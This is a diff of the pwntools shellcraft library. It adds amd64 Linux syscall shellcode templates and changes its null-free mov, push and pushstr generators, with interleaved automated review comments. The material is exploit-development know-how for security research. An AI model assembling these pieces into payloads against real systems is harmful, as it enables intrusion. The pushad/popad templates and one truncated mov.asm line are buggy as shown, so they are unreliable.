b/pwnlib/shellcraft/templates/amd64/linux/timer_settime.asm new file mode 100644 index 000000000..7f71595b8 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/timer_settime.asm 
@@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="timerid, flags, value, ovalue"/> +<%docstring> +Invokes the syscall timer_settime. See 'man 2 timer_settime' for more information. + +Arguments: + timerid(timer_t): timerid + flags(int): flags + value(itimerspec): value + ovalue(itimerspec): ovalue + + + ${syscall('SYS_timer_settime', timerid, flags, value, ovalue)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/truncate.asm b/pwnlib/shellcraft/templates/amd64/linux/truncate.asm new file mode 100644 index 000000000..f94a9d089 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/truncate.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="file, length"/> +<%docstring> +Invokes the syscall truncate. See 'man 2 truncate' for more information. + +Arguments: + file(char): file + length(off_t): length + + + ${syscall('SYS_truncate', file, length)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/truncate64.asm b/pwnlib/shellcraft/templates/amd64/linux/truncate64.asm new file mode 100644 index 000000000..715daecb9 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/truncate64.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="file, length"/> +<%docstring> +Invokes the syscall truncate64. See 'man 2 truncate64' for more information. + +Arguments: + file(char): file + length(off64_t): length + + + ${syscall('SYS_truncate64', file, length)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/ulimit.asm b/pwnlib/shellcraft/templates/amd64/linux/ulimit.asm new file mode 100644 index 000000000..0772512df --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/ulimit.asm 
@@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="cmd, vararg"/> +<%docstring> +Invokes the syscall ulimit. See 'man 2 ulimit' for more information. + +Arguments: + cmd(int): cmd + vararg(int): vararg + + + ${syscall('SYS_ulimit', cmd, vararg)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/umask.asm b/pwnlib/shellcraft/templates/amd64/linux/umask.asm new file mode 100644 index 000000000..4c09a0cbd --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/umask.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="mask"/> +<%docstring> +Invokes the syscall umask. See 'man 2 umask' for more information. + +Arguments: + mask(mode_t): mask + + + ${syscall('SYS_umask', mask)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/uname.asm b/pwnlib/shellcraft/templates/amd64/linux/uname.asm new file mode 100644 index 000000000..b7e560ddf --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/uname.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="name"/> +<%docstring> +Invokes the syscall uname. See 'man 2 uname' for more information. + +Arguments: + name(utsname): name + + + ${syscall('SYS_uname', name)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/unlink.asm b/pwnlib/shellcraft/templates/amd64/linux/unlink.asm new file mode 100644 index 000000000..8e91f8b40 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/unlink.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="name"/> +<%docstring> +Invokes the syscall unlink. See 'man 2 unlink' for more information. + +Arguments: + name(char): name + + + ${syscall('SYS_unlink', name)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/unlinkat.asm b/pwnlib/shellcraft/templates/amd64/linux/unlinkat.asm new file mode 100644 index 000000000..89b124fe9 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/unlinkat.asm 
@@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fd, name, flag"/> +<%docstring> +Invokes the syscall unlinkat. See 'man 2 unlinkat' for more information. + +Arguments: + fd(int): fd + name(char): name + flag(int): flag + + + ${syscall('SYS_unlinkat', fd, name, flag)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/unshare.asm b/pwnlib/shellcraft/templates/amd64/linux/unshare.asm new file mode 100644 index 000000000..6a86cd3a3 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/unshare.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="flags"/> +<%docstring> +Invokes the syscall unshare. See 'man 2 unshare' for more information. + +Arguments: + flags(int): flags + + + ${syscall('SYS_unshare', flags)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/ustat.asm b/pwnlib/shellcraft/templates/amd64/linux/ustat.asm new file mode 100644 index 000000000..eb65b170c --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/ustat.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="dev, ubuf"/> +<%docstring> +Invokes the syscall ustat. See 'man 2 ustat' for more information. + +Arguments: + dev(dev_t): dev + ubuf(ustat): ubuf + + + ${syscall('SYS_ustat', dev, ubuf)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/utime.asm b/pwnlib/shellcraft/templates/amd64/linux/utime.asm new file mode 100644 index 000000000..3a2d54db2 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/utime.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="file, file_times"/> +<%docstring> +Invokes the syscall utime. See 'man 2 utime' for more information. + +Arguments: + file(char): file + file_times(utimbuf): file_times + + + ${syscall('SYS_utime', file, file_times)} 
diff --git a/pwnlib/shellcraft/templates/amd64/linux/utimensat.asm b/pwnlib/shellcraft/templates/amd64/linux/utimensat.asm new file mode 100644 index 000000000..2aa68cbb0 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/utimensat.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fd, path, times, flags"/> +<%docstring> +Invokes the syscall utimensat. See 'man 2 utimensat' for more information. + +Arguments: + fd(int): fd + path(char): path + times(timespec): times + flags(int): flags + + + ${syscall('SYS_utimensat', fd, path, times, flags)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/utimes.asm b/pwnlib/shellcraft/templates/amd64/linux/utimes.asm new file mode 100644 index 000000000..2a15054d6 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/utimes.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="file, tvp"/> +<%docstring> +Invokes the syscall utimes. See 'man 2 utimes' for more information. + +Arguments: + file(char): file + tvp(timeval): tvp + + + ${syscall('SYS_utimes', file, tvp)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/vfork.asm b/pwnlib/shellcraft/templates/amd64/linux/vfork.asm new file mode 100644 index 000000000..ad8dcca70 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/vfork.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall vfork. See 'man 2 vfork' for more information. + +Arguments: + + + + ${syscall('SYS_vfork')} diff --git a/pwnlib/shellcraft/templates/amd64/linux/vhangup.asm b/pwnlib/shellcraft/templates/amd64/linux/vhangup.asm new file mode 100644 index 000000000..3d63b761a --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/vhangup.asm 
@@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall vhangup. See 'man 2 vhangup' for more information. + +Arguments: + + + + ${syscall('SYS_vhangup')} diff --git a/pwnlib/shellcraft/templates/amd64/linux/vmsplice.asm b/pwnlib/shellcraft/templates/amd64/linux/vmsplice.asm new file mode 100644 index 000000000..622a1c490 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/vmsplice.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fdout, iov, count, flags"/> +<%docstring> +Invokes the syscall vmsplice. See 'man 2 vmsplice' for more information. + +Arguments: + fdout(int): fdout + iov(iovec): iov + count(size_t): count + flags(unsigned): flags + + + ${syscall('SYS_vmsplice', fdout, iov, count, flags)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/wait4.asm b/pwnlib/shellcraft/templates/amd64/linux/wait4.asm new file mode 100644 index 000000000..f5c156247 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/wait4.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="pid, stat_loc, options, usage"/> +<%docstring> +Invokes the syscall wait4. See 'man 2 wait4' for more information. + +Arguments: + pid(pid_t): pid + stat_loc(WAIT_STATUS): stat_loc + options(int): options + usage(rusage): usage + + + ${syscall('SYS_wait4', pid, stat_loc, options, usage)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/waitid.asm b/pwnlib/shellcraft/templates/amd64/linux/waitid.asm new file mode 100644 index 000000000..6370ca27c --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/waitid.asm 
@@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="idtype, id, infop, options"/> +<%docstring> +Invokes the syscall waitid. See 'man 2 waitid' for more information. + +Arguments: + idtype(idtype_t): idtype + id(id_t): id + infop(siginfo_t): infop + options(int): options + + + ${syscall('SYS_waitid', idtype, id, infop, options)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/waitpid.asm b/pwnlib/shellcraft/templates/amd64/linux/waitpid.asm new file mode 100644 index 000000000..00eaf639e --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/waitpid.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="pid, stat_loc, options"/> +<%docstring> +Invokes the syscall waitpid. See 'man 2 waitpid' for more information. + +Arguments: + pid(pid_t): pid + stat_loc(int): stat_loc + options(int): options + + + ${syscall('SYS_waitpid', pid, stat_loc, options)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/write.asm b/pwnlib/shellcraft/templates/amd64/linux/write.asm new file mode 100644 index 000000000..26cf86807 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/write.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fd, buf, n"/> +<%docstring> +Invokes the syscall write. See 'man 2 write' for more information. + +Arguments: + fd(int): fd + buf(void): buf + n(size_t): n + + + ${syscall('SYS_write', fd, buf, n)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/writeloop.asm b/pwnlib/shellcraft/templates/amd64/linux/writeloop.asm new file mode 100644 index 000000000..de686af48 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/writeloop.asm 
@@ -0,0 +1,25 @@ +<% from pwnlib.shellcraft import amd64 %> +<% from pwnlib.shellcraft import common %> +<%page args="readsock=0, writesock=1"/> +<%docstring> +Reads from a buffer of a size and location determined at runtime. +When the shellcode is executing, it should send a pointer and +pointer-width size to determine the location and size of buffer. + +<% +after = common.label("after") +before = common.label("before") +%> + +${before}: + /* Read address / size tuples from fd ${readsock}, and + then write the data to fd ${writesock} */ + ${amd64.linux.readptr(readsock, 'rsi')} + push rsi + ${amd64.linux.readptr(readsock, 'rdx')} + pop rsi + test rdx, rdx + jz ${after} + ${amd64.linux.syscall('SYS_write', writesock, 'rsi', 'rdx')} + jmp ${before} +${after}: \ No newline at end of file diff --git a/pwnlib/shellcraft/templates/amd64/linux/writev.asm b/pwnlib/shellcraft/templates/amd64/linux/writev.asm new file mode 100644 index 000000000..38fb8aff6 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/writev.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fd, iovec, count"/> +<%docstring> +Invokes the syscall writev. See 'man 2 writev' for more information. + +Arguments: + fd(int): fd + iovec(iovec): iovec + count(int): count + + + ${syscall('SYS_writev', fd, iovec, count)} diff --git a/pwnlib/shellcraft/templates/amd64/memcpy.asm b/pwnlib/shellcraft/templates/amd64/memcpy.asm new file mode 100644 index 000000000..51c9de720 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/memcpy.asm @@ -0,0 +1,13 @@ +<% from pwnlib.shellcraft import amd64, pretty %> +<%docstring>Copies memory. + +Args: + dest: Destination address + src: Source address + n: Number of bytes + +<%page args="dest, src, n"/> + /* memcpy(${pretty(dest)}, ${pretty(src)}, ${pretty(n)}) */ + cld + ${amd64.setregs({'rdi': dest, 'rsi': src, 'rcx': n})} + rep movsb 
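Review bot: The `push rsi`/`pop rsi` pair around the second `readptr` in writeloop.asm is unexplained; presumably `readptr` uses rsi as the read() buffer register and would clobber the address just read, but that is inferred rather than visible here. A one-line comment such as `/* readptr clobbers rsi; preserve the address across the size read */` would make the intent explicit. The file also ends without a trailing newline.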
diff --git a/pwnlib/shellcraft/templates/amd64/mov.asm b/pwnlib/shellcraft/templates/amd64/mov.asm index 390110d8b..4c271a400 100644 --- a/pwnlib/shellcraft/templates/amd64/mov.asm +++ b/pwnlib/shellcraft/templates/amd64/mov.asm @@ -1,9 +1,8 @@ <% from pwnlib.util import lists, packing, fiddling, misc - from pwnlib import constants from pwnlib.context import context as ctx # Ugly hack, mako will not let it be called context from pwnlib.log import getLogger - from pwnlib.shellcraft import i386 + from pwnlib.shellcraft import eval, pretty, okay from pwnlib.shellcraft.registers import get_register, is_register, bits_required log = getLogger('pwnlib.shellcraft.amd64.mov') %> @@ -27,11 +26,11 @@ Example: >>> print shellcraft.amd64.mov('eax','ebx').rstrip() mov eax, ebx >>> print shellcraft.amd64.mov('eax', 0).rstrip() - xor eax, eax + xor eax, eax /* 0 */ >>> print shellcraft.amd64.mov('ax', 0).rstrip() - xor ax, ax + xor ax, ax /* 0 */ >>> print shellcraft.amd64.mov('rax', 0).rstrip() - xor eax, eax + xor eax, eax /* 0 */ >>> print shellcraft.amd64.mov('rdi', 'ax').rstrip() movzx edi, ax >>> print shellcraft.amd64.mov('al', 'ax').rstrip() 
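Review bot: `from pwnlib.shellcraft import eval, pretty, okay` shadows the builtin `eval` inside the template, and the later `src = eval(src)` (in the `@@ -113,7 +102,7 @@` hunk) then reads like the builtin being applied to a caller-supplied string. Importing it under a distinct name, `from pwnlib.shellcraft import eval as sc_eval, pretty, okay` and `src = sc_eval(src)`, keeps the constant-expression evaluator visibly separate from Python's `eval` for anyone auditing what reaches it.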
@@ -39,36 +38,39 @@ Example: >>> print shellcraft.amd64.mov('ax', 'bl').rstrip() movzx ax, bl >>> print shellcraft.amd64.mov('eax', 1).rstrip() - push 0x1 + push 1 pop rax >>> print shellcraft.amd64.mov('rax', 0xc0).rstrip() xor eax, eax mov al, 0xc0 >>> print shellcraft.amd64.mov('rax', 0xc000).rstrip() xor eax, eax - mov ah, 0xc0 + mov ah, 0xc000 >> 8 >>> print shellcraft.amd64.mov('rax', 0xc0c0).rstrip() xor eax, eax mov ax, 0xc0c0 + >>> print shellcraft.amd64.mov('rdi', 0xff).rstrip() + mov edi, 0x1010101 /* 255 == 0xff */ + xor edi, 0x10101fe >>> print shellcraft.amd64.mov('rax', 0xdead00ff).rstrip() - mov eax, 0x1010101 + mov eax, 0x1010101 /* 3735879935 == 0xdead00ff */ xor eax, 0xdfac01fe >>> print shellcraft.amd64.mov('rax', 0x11dead00ff).rstrip() - mov rax, 0x101010101010101 + mov rax, 0x101010101010101 /* 76750323967 == 0x11dead00ff */ push rax mov rax, 0x1010110dfac01fe xor [rsp], rax pop rax >>> with context.local(os = 'linux'): ... print shellcraft.amd64.mov('eax', 'SYS_read').rstrip() - xor eax, eax + xor eax, eax /* (SYS_read) */ >>> with context.local(os = 'freebsd'): ... print shellcraft.amd64.mov('eax', 'SYS_read').rstrip() - push 0x3 + push (SYS_read) /* 3 */ pop rax >>> with context.local(os = 'linux'): ... print shellcraft.amd64.mov('eax', 'PROT_READ | PROT_WRITE | PROT_EXEC').rstrip() - push 0x7 + push (PROT_READ | PROT_WRITE | PROT_EXEC) /* 7 */ pop rax Args: @@ -77,19 +79,6 @@ Args: stack_allowed (bool): Can the stack be used? <% -def okay(s): - return '\0' not in s and '\n' not in s - -def pretty(n): - if n < 0: - return str(n) - else: - return hex(n) - -src_name = src -if not isinstance(src, (str, tuple)): - src_name = pretty(src) - if not get_register(dest): log.error('%r is not a register' % dest) @@ -113,7 +102,7 @@ if get_register(src): src_size = src.size else: with ctx.local(arch = 'amd64'): - src = constants.eval(src) + src = eval(src) if not dest.fits(src): log.error("cannot mov %s, %r: dest is smaller than src" % (dest, src)) 
@@ -124,12 +113,11 @@ else: dest = get_register(dest.native32) # Calculate the packed version - srcp = packing.pack(src, dest.size) + srcp = packing.pack(src & ((1<\ % if is_register(src): % if src == dest: @@ -145,7 +133,7 @@ else: ## Special case for zeroes ## XORing the 32-bit register clears the high 32 bits as well % if src == 0: - xor ${dest}, ${dest} + xor ${dest}, ${dest} /* ${src} */ ## Special case for *just* a newline % elif stack_allowed and dest.size in (32,64) and src == 10: push 9 /* mov ${dest}, '\n' */ @@ -157,7 +145,7 @@ else: ## 6aff58 push -1; pop rax ## 48c7c0ffffffff mov rax, -1 % elif stack_allowed and dest.size in (32,64) and (-2**7 <= srcs < 2**7) and okay(srcp[:1]): - push ${pretty(srcs)} + push ${pretty(src)} pop ${dest.native64} ## Easy case, everybody is trivially happy ## This implies that the register size and value are the same. 
@@ -165,53 +153,53 @@ else: mov ${dest}, ${pretty(src)} ## We can push 32-bit values onto the stack and they are sign-extended. % elif stack_allowed and dest.size in (32,64) and (-2**31 <= srcs < 2**31) and okay(srcp[:4]): - push ${pretty(srcs)} + push ${pretty(src)} pop ${dest.native64} ## We can also leverage the sign-extension to our advantage. ## For example, 0xdeadbeef is sign-extended to 0xffffffffdeadbeef. ## Want EAX=0xdeadbeef, we don't care that RAX=0xfff...deadbeef. % elif stack_allowed and dest.size == 32 and srcu < 2**32 and okay(srcp[:4]): - push ${pretty(srcs)} + push ${pretty(src)} pop ${dest.native64} ## Target value is an 8-bit value, use a 8-bit mov - % elif srcu < 2**8 and okay(srcp[:1]): + % elif srcu < 2**8 and okay(srcp[:1]) and 8 in dest.sizes: xor ${dest.xor}, ${dest.xor} - mov ${dest.sizes[8]}, ${pretty(srcu)} + mov ${dest.sizes[8]}, ${pretty(src)} ## Target value is a 16-bit value with no data in the low 8 bits ## means we can use the 'AH' style register. % elif srcu == srcu & 0xff00 and okay(srcp[1]) and dest.ff00: xor ${dest}, ${dest} - mov ${dest.ff00}, ${pretty(srcu >> 8)} + mov ${dest.ff00}, ${pretty(src)} >> 8 ## Target value is a 16-bit value, use a 16-bit mov % elif srcu < 2**16 and okay(srcp[:2]): xor ${dest.xor}, ${dest.xor} - mov ${dest.sizes[16]}, ${pretty(srcu)} + mov ${dest.sizes[16]}, ${pretty(src)} ## Target value is a 32-bit value, use a 32-bit mov. ## Note that this is zero-extended rather than sign-extended (the 32-bit push above). % elif srcu < 2**32 and okay(srcp[:4]): - mov ${dest.sizes[32]}, ${pretty(srcu)} + mov ${dest.sizes[32]}, ${pretty(src)} ## All else has failed. Use some XOR magic to move things around. 
% else: <% a,b = fiddling.xor_pair(srcp, avoid = '\x00\n') - a = pretty(packing.unpack(a, dest.size, endian='little', sign=False)) - b = pretty(packing.unpack(b, dest.size, endian='little', sign=False)) + a = '%#x' % packing.unpack(a, dest.size) + b = '%#x' % packing.unpack(b, dest.size) %>\ ## There's no XOR REG, IMM64 but we can take the easy route ## for smaller registers. % if dest.size != 64: - mov ${dest}, ${a} - xor ${dest}, ${b} + mov ${dest}, ${a} /* ${str(src)} == ${"%#x" % (src)} */ + xor ${dest}, ${b} ## However, we can PUSH IMM64 and then perform the XOR that ## way at the top of the stack. % elif stack_allowed: - mov ${dest}, ${a} - push ${dest} - mov ${dest}, ${b} - xor [rsp], ${dest} - pop ${dest} + mov ${dest}, ${a} /* ${str(src)} == ${"%#x" % (src)} */ + push ${dest} + mov ${dest}, ${b} + xor [rsp], ${dest} + pop ${dest} % else: - <% log.error("Cannot put %s into '%s' without using stack." % (pretty(src), dest_orig)) %>\ + <% log.error("Cannot put %s into '%s' without using stack." % (pretty(src), dest_orig)) %>\ % endif % endif % else: diff --git a/pwnlib/shellcraft/templates/amd64/popad.asm b/pwnlib/shellcraft/templates/amd64/popad.asm new file mode 100644 index 000000000..cb4484fd5 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/popad.asm @@ -0,0 +1,13 @@ +<% from pwnlib.shellcraft import amd64 %> +<%docstring> +Pop all of the registers onto the stack which i386 popad does, +in the same order. + + pop rdi + pop rsi + pop rbp + pop rsp + pop rbp + pop rdx + pop rcx + pop rax diff --git a/pwnlib/shellcraft/templates/amd64/push.asm b/pwnlib/shellcraft/templates/amd64/push.asm index 051a0d5e3..b5b34f254 100644 --- a/pwnlib/shellcraft/templates/amd64/push.asm +++ b/pwnlib/shellcraft/templates/amd64/push.asm 
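Review bot: popad.asm does not mirror i386 `popad`, which restores EDI, ESI, EBP, skips the saved ESP, then EBX, EDX, ECX, EAX: the new sequence pops `rbp` twice and never restores `rbx`, so the fifth line should be `pop rbx`. The fourth line `pop rsp` reloads the stack pointer from the saved slot; that is self-consistent only when paired with this exact pushad.asm, and `add rsp, 8` (skip the slot) states the intent. pushad.asm in the next file section has the matching defect (`push rbp` in fourth position where `push rbx` is expected), so the two templates should be fixed together. The docstring wording `Pop all of the registers onto the stack` should read `off the stack`.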
@@ -1,7 +1,9 @@ <% from pwnlib.util import packing from pwnlib.shellcraft import amd64 + from pwnlib.shellcraft.amd64 import pushstr from pwnlib import constants + from pwnlib.shellcraft.registers import amd64 as regs from pwnlib.context import context as ctx # Ugly hack, mako will not let it be called context import re %> @@ -22,39 +24,42 @@ Example: >>> print pwnlib.shellcraft.amd64.push(0).rstrip() /* push 0 */ - push 0x1 + push 1 dec byte ptr [rsp] >>> print pwnlib.shellcraft.amd64.push(1).rstrip() /* push 1 */ - push 0x1 + push 1 >>> print pwnlib.shellcraft.amd64.push(256).rstrip() /* push 256 */ - push 0x1010201 - xor dword ptr [rsp], 0x1010301 + push 0x1010201 ^ 0x100 + xor dword ptr [rsp], 0x1010201 >>> with context.local(os = 'linux'): ... print pwnlib.shellcraft.amd64.push('SYS_write').rstrip() /* push 'SYS_write' */ - push 0x1 + push 1 >>> with context.local(os = 'freebsd'): ... print pwnlib.shellcraft.amd64.push('SYS_write').rstrip() /* push 'SYS_write' */ - push 0x4 + push 4 <% value_orig = value - if isinstance(value, (str, unicode)): + is_reg = False + if value in regs: + is_reg = True + if not is_reg and isinstance(value, (str, unicode)): try: with ctx.local(arch = 'amd64'): value = constants.eval(value) except (ValueError, AttributeError): - pass + pass %> - -% if isinstance(value, (int,long)): +%if not is_reg: /* push ${repr(value_orig)} */ ${re.sub(r'^\s*/.*\n', '', amd64.pushstr(packing.pack(value), False), 1)} % else: push ${value} % endif + diff --git a/pwnlib/shellcraft/templates/amd64/pushad.asm b/pwnlib/shellcraft/templates/amd64/pushad.asm new file mode 100644 index 000000000..9a73bd594 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/pushad.asm @@ -0,0 +1,13 @@ +<% from pwnlib.shellcraft import amd64 %> +<%docstring> +Push all of the registers onto the stack which i386 pushad does, +in the same order. + + push rax + push rcx + push rdx + push rbp + push rsp + push rbp + push rsi + push rdi 
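Review bot: `from pwnlib.shellcraft.amd64 import pushstr` added in the first push.asm hunk is unused — the body still calls `amd64.pushstr(...)` — so one of the two should go. Aliasing `from pwnlib.shellcraft.registers import amd64 as regs` is the right call, since the template already binds `amd64` to the shellcraft module.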
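Review bot: Replacing `% if isinstance(value, (int,long)):` with `%if not is_reg:` changes what happens to a non-register string that `constants.eval` cannot resolve: the `except (ValueError, AttributeError): pass` leaves `value` as a str, which now reaches `packing.pack(value)` instead of the old `push ${value}` fallback, presumably failing inside pack with an unhelpful message. Either keep the int check as a second condition, `%if not is_reg and isinstance(value, (int, long)):`, or replace the silent `pass` with an explicit error naming `value_orig` so the failure is reported where it happens.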
diff --git a/pwnlib/shellcraft/templates/amd64/pushstr.asm b/pwnlib/shellcraft/templates/amd64/pushstr.asm index 4ec1611c5..9f679316e 100644 --- a/pwnlib/shellcraft/templates/amd64/pushstr.asm +++ b/pwnlib/shellcraft/templates/amd64/pushstr.asm @@ -1,4 +1,7 @@ -<% from pwnlib.util import lists, packing, fiddling %>\ +<% + from pwnlib.util import lists, packing, fiddling + from pwnlib.shellcraft import pretty +%>\ <%page args="string, append_null = True"/> <%docstring> Pushes a string onto the stack without using @@ -8,36 +11,38 @@ Example: >>> print shellcraft.amd64.pushstr('').rstrip() /* push '\x00' */ - push 0x1 + push 1 dec byte ptr [rsp] >>> print shellcraft.amd64.pushstr('a').rstrip() /* push 'a\x00' */ push 0x61 >>> print shellcraft.amd64.pushstr('aa').rstrip() /* push 'aa\x00' */ - push 0x... - xor dword ptr [rsp], 0x... + push 0x1010101 ^ 0x6161 + xor dword ptr [rsp], 0x1010101 >>> print shellcraft.amd64.pushstr('aaa').rstrip() /* push 'aaa\x00' */ - push 0x... - xor dword ptr [rsp], 0x... + push 0x1010101 ^ 0x616161 + xor dword ptr [rsp], 0x1010101 >>> print shellcraft.amd64.pushstr('aaaa').rstrip() /* push 'aaaa\x00' */ push 0x61616161 >>> print shellcraft.amd64.pushstr('aaa\xc3').rstrip() /* push 'aaa\xc3\x00' */ - push 0x... - xor dword ptr [rsp], 0x... + mov rax, 0x101010101010101 + push rax + mov rax, 0x101010101010101 ^ 0xc3616161 + xor [rsp], rax >>> print shellcraft.amd64.pushstr('aaa\xc3', append_null = False).rstrip() /* push 'aaa\xc3' */ - push 0x... + push -0x3c9e9e9f >>> print shellcraft.amd64.pushstr('\xc3').rstrip() /* push '\xc3\x00' */ - push 0x... - xor dword ptr [rsp], 0x... + push 0x1010101 ^ 0xc3 + xor dword ptr [rsp], 0x1010101 >>> print shellcraft.amd64.pushstr('\xc3', append_null = False).rstrip() /* push '\xc3' */ - push 0x...c3 + push -0x3d >>> with context.local(): ... context.arch = 'amd64' ... print enhex(asm(shellcraft.pushstr("/bin/sh"))) 
@@ -56,7 +61,7 @@ Args: append_null (bool): Whether to append a single NULL-byte before pushing. <% - if append_null: + if append_null and not string.endswith('\x00'): string += '\x00' if not string: return @@ -68,14 +73,12 @@ Args: extend = '\xff' else: extend = '\x00' - - def pretty(n): - return hex(n & (2 ** 64 - 1)) %>\ /* push ${repr(string)} */ % for word in lists.group(8, string, 'fill', extend)[::-1]: <% sign = packing.u64(word, endian='little', sign='signed') + sign32 = packing.u32(word[:4], bits=32, endian='little', sign='signed') %>\ % if sign in [0, 0xa]: push ${pretty(sign + 1)} @@ -85,16 +88,16 @@ Args: % elif -0x80000000 <= sign <= 0x7fffffff and okay(word[:4]): push ${pretty(sign)} % elif okay(word): - mov rax, ${hex(sign)} + mov rax, ${pretty(sign)} push rax -% elif word[4:] == '\x00\x00\x00\x00': +% elif sign32 > 0 and word[4:] == '\x00\x00\x00\x00': <% a,b = fiddling.xor_pair(word[:4], avoid = '\x00\n') - a = packing.u32(a, endian='little', sign='unsigned') + a = packing.u32(a, endian='little', sign='signed') b = packing.u32(b, endian='little', sign='unsigned') %>\ - push ${pretty(a)} - xor dword ptr [rsp], ${pretty(b)} + push ${pretty(a)} ^ ${pretty(sign)} + xor dword ptr [rsp], ${pretty(a)} % else: <% a,b = fiddling.xor_pair(word, avoid = '\x00\n') @@ -103,7 +106,7 @@ Args: %>\ mov rax, ${pretty(a)} push rax - mov rax, ${pretty(b)} + mov rax, ${pretty(a)} ^ ${pretty(sign)} xor [rsp], rax % endif % endfor diff --git a/pwnlib/shellcraft/templates/amd64/pushstr_array.asm b/pwnlib/shellcraft/templates/amd64/pushstr_array.asm new file mode 100644 index 000000000..d76cf0eab --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/pushstr_array.asm 
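Review bot: In the `@@ -85,16 +88,16 @@` hunk `b` is still computed (`b = packing.u32(b, endian='little', sign='unsigned')`) but no longer emitted, since the second operand became `${pretty(a)} ^ ${pretty(sign)}`; the dead assignment should be dropped, and the same likely holds for the `b` of the following `@@ -103,7 +106,7 @@` hunk. The new `sign32 > 0` guard deserves a why-comment, because it is what keeps the 32-bit `push` path correct: `## push imm32 sign-extends into the high dword, so only a positive low dword can pair with a zero high dword`.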
@@ -0,0 +1,38 @@ +<% from pwnlib.shellcraft import amd64 %> +<%docstring> +Pushes an array/envp-style array of pointers onto the stack. + +Arguments: + reg(str): + Destination register to hold the pointer. + array(str,list): + Single argument or list of arguments to push. + NULL termination is normalized so that each argument + ends with exactly one NULL byte. + +<%page args="reg, array"/> +<% +if isinstance(array, (str)): + array = [array] + +array_str = '' + +# Normalize all of the arguments' endings +array = [arg.rstrip('\x00') + '\x00' for arg in array] +array_str = ''.join(array) + +word_size = 8 +offset = len(array_str) + word_size + +%>\ + /* push argument array ${repr(array)} */ + ${amd64.pushstr(array_str)} + ${amd64.mov(reg, 0)} + push ${reg} /* null terminate */ +% for i,arg in enumerate(reversed(array)): + ${amd64.mov(reg, offset + word_size*i - len(arg))} + add ${reg}, rsp + push ${reg} /* ${repr(arg)} */ + <% offset -= len(arg) %>\ +% endfor + ${amd64.mov(reg,'rsp')} diff 